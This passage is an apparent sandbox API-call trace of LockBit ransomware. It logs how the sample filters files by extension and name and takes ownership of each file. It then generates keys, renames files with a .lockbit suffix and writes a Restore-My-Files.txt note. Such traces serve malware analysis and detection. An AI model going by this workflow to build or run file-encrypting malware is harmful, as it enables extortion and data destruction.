(pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png") returned=".png" [0085.705] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.705] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.705] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.705] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.706] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.706] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.707] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.707] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png.lockbit") returned 86 [0085.707] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.707] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.708] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.708] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.708] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.708] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.708] RtlFreeAnsiString (AnsiString="\\") [0085.708] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.708] malloc (_Size=0x200) returned 0x77d800 [0085.709] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.709] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.709] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.709] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.709] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.710] CloseHandle (hObject=0x3c0) returned 1 [0085.710] free (_Block=0x77d800) [0085.710] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.710] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.710] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.710] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5620) returned 1 [0085.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.712] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.718] malloc (_Size=0xc2) returned 0x77d800 [0085.718] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0085.719] free (_Block=0x77d800) [0085.719] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.719] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.719] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.719] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa86831, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa86831, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.719] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.719] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.719] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0085.719] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.719] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.719] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.719] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.720] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.720] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.720] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.721] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.721] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.722] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.722] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.722] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.722] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.722] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.722] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.722] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.722] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.722] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.722] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.722] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png") returned=".png" [0085.722] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.723] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.723] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.723] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.724] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.724] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.724] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.724] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png.lockbit") returned 96 [0085.724] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.725] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.725] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.725] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.725] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.726] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.726] RtlFreeAnsiString (AnsiString="\\") [0085.726] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.726] malloc (_Size=0x200) returned 0x77d800 [0085.726] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.726] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.726] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.726] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.727] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.727] CloseHandle (hObject=0x3b8) returned 1 [0085.727] free (_Block=0x77d800) [0085.727] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.728] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.728] malloc (_Size=0x40068) returned 0x3d70048 [0085.729] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5088) returned 1 [0085.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.731] ReadFile (in: hFile=0x3b8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.749] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.749] malloc (_Size=0xd6) returned 0x1ff1e60 [0085.749] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd6, FileInformationClass=0xa) returned 0x0 [0085.750] free (_Block=0x1ff1e60) [0085.750] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.750] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.750] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.750] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.750] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.750] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.750] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0085.750] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.750] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.751] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.751] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.751] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.751] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.751] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.751] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.752] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.752] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.752] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.752] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.752] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.752] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.753] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0085.753] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.753] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.753] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".myd", lpString2=".png") 